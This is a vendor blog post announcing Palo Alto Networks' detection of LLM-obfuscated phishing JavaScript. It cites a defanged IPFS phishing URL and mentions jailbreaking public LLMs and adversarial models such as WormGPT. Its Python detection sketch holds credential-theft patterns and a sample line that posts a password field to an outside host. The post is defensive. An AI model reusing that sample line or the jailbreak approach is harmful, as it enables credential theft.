Stopping AI-Powered Threats: Palo Alto Networks Detects LLM-Generated Attacks in Real-Time


As AI-driven threats evolve, so must cybersecurity defenses. Palo Alto Networks introduces LLM-Generated Attacks Detection, an advanced security capability designed to counter threats created using large language models (LLMs). Cybercriminals are leveraging AI to craft sophisticated phishing campaigns, automate malware generation, and bypass traditional security measures with unprecedented speed and precision.

 

What Are LLM-Generated Attacks, and Why Are They So Important?

 

Large Language Models (LLMs) have brought significant benefits to many industries. However, cybercriminals now exploit Generative AI to craft advanced, customized, and seemingly harmless malicious JavaScript that easily evades detection. Unlike traditional off-the-shelf tools like obfuscator.io, which generate predictable and detectable transformations, LLM-assisted malicious content appears more organic and benign. This allows obfuscated scripts to retain their harmful intent while mimicking legitimate behavior, rendering pattern-based detection methods ineffective.
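To make that limitation concrete, here is a minimal, hypothetical Python sketch of a signature-style check. The regex and the two sample snippets are illustrative assumptions, not Palo Alto Networks detection logic: a pattern tuned to obfuscator.io-style identifiers fires on tool-generated output but sees nothing unusual in an LLM-rewritten equivalent.

```python
import re

# Hypothetical signature check (illustrative only, not Palo Alto Networks
# detection logic). obfuscator.io output typically contains hex-style
# identifiers such as _0x3f2a, which a naive detector can flag with a regex.
OBFUSCATOR_STYLE_IDENTIFIER = re.compile(r"_0x[0-9a-f]{4,6}")

def looks_machine_obfuscated(js_source: str) -> bool:
    """Flag the predictable identifier patterns of off-the-shelf obfuscators."""
    return bool(OBFUSCATOR_STYLE_IDENTIFIER.search(js_source))

# Classic tool-generated output: the signature fires.
tool_obfuscated = "var _0x1ac4=['value'];function _0x52ab(_0x3f2a){return _0x1ac4[_0x3f2a];}"

# An LLM-rewritten equivalent with ordinary-looking names: the same signature
# sees nothing suspicious, even though the behavior is unchanged.
llm_rewritten = "function getFieldValue(field) { return field.value; }"

print(looks_machine_obfuscated(tool_obfuscated))  # True
print(looks_machine_obfuscated(llm_rewritten))    # False
```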

 

The significance of LLM-generated attacks lies in their ability to bypass static analysis tools and make malicious code appear legitimate. This emerging technique poses a serious cybersecurity threat, as it enables the large-scale creation of malware variants. Adversarial LLMs, such as WormGPT and FraudGPT, are accelerating the adoption of this attack vector, underscoring the need for cybersecurity professionals to stay ahead of these evolving threats. Additionally, techniques like jailbreaking (e.g., via DeepSeek) allow adversaries to circumvent built-in safeguards in publicly available LLMs, further enabling highly sophisticated AI-driven attacks.

 

Example of an LLM-Generated Attack

 

Our research team discovered obfuscated code designed to steal webmail login credentials from a Web 3.0 IPFS phishing page hosted at bafkreihpvn2wkpofobf4ctonbmzty24fr73fzf4jbyiydn3qvke55kywdi[.]ipfs[.]dweb[.]link. At the time of detection in November 2024, the identified JavaScript samples had not been observed on VirusTotal. These LLM-generated samples closely resembled existing phishing scripts, but their organic, benign-looking structure concealed the same harmful intent.

 

Below is a screenshot of an obfuscated phishing script page alongside the corresponding de-obfuscated malicious JavaScript, which exfiltrates login credentials to Telegram.

 

Figure 1: Obfuscated phishing script page and the corresponding de-obfuscated JavaScript that exfiltrates login credentials to Telegram.

 

How Does Palo Alto Networks Identify, Detect, and Block LLM-Generated Attacks?

 

Our newly developed deep learning model prioritizes code intent and functionality, ensuring resilience against superficial changes. This approach, combined with real-time detection, allows us to effectively identify and block AI-generated phishing attempts.
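Palo Alto Networks has not published the internals of this model, so the sketch below is only a rough illustration of scoring code by behavior rather than surface form. The feature names, regular expressions, entropy threshold, and scoring function are assumptions made for the example, not the production detector:

```python
import math
import re

# Illustrative behavioral features (assumed for this sketch); the real model
# is a deep learning classifier, not a regex table.
BEHAVIOR_PATTERNS = {
    "reads_credentials": r"(password|passwd|credential|login)",
    "sends_data_out":    r"(fetch|XMLHttpRequest|sendBeacon)",
    "dynamic_eval":      r"\b(eval|Function)\s*\(",
}

def shannon_entropy(text: str) -> float:
    """High entropy in string literals often indicates packed or encoded payloads."""
    if not text:
        return 0.0
    freqs = [text.count(c) / len(text) for c in set(text)]
    return -sum(p * math.log2(p) for p in freqs)

def extract_features(js_source: str) -> dict:
    """Describe what the code does, independent of identifier names or layout."""
    feats = {name: bool(re.search(pattern, js_source, re.IGNORECASE))
             for name, pattern in BEHAVIOR_PATTERNS.items()}
    literals = re.findall(r'"([^"]*)"|\'([^\']*)\'', js_source)
    feats["high_entropy_strings"] = shannon_entropy(
        "".join(a or b for a, b in literals)) > 4.5
    return feats

def intent_score(feats: dict) -> float:
    """Toy stand-in for the model: fraction of risky behaviors present."""
    return sum(feats.values()) / len(feats)

if __name__ == "__main__":
    sample = ('var v = document.querySelector("#password").value; '
              'fetch("https://collector.invalid/log", {method: "POST", body: v});')
    features = extract_features(sample)
    print(features, round(intent_score(features), 2))
```

Because these features describe what the script does rather than how it is written, renaming identifiers or restructuring the code does not change the score, which is the resilience to superficial changes described above.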

 

When Will the Detection Be Available?

 

LLM-generated attack detection has been in production since January 2024 and is available now.

 

What Action Is Needed to Benefit from LLM-Generated Attack Detection?

 

To benefit from the enhanced detection capabilities, organizations should set the real-time detection category to alert and follow the best-practice guidelines provided in this Live Community post. Decryption must also be enabled on the firewall so that it can inspect the traffic. This functionality requires inline cloud analysis and PAN-OS 10.2 or later.

 

Additional Information

 

For a comprehensive understanding of URL Filtering Category Best Practices, please refer to the provided documentation. Additionally, visit our research team's blog to stay informed about the latest developments in LLM-generated attacks.
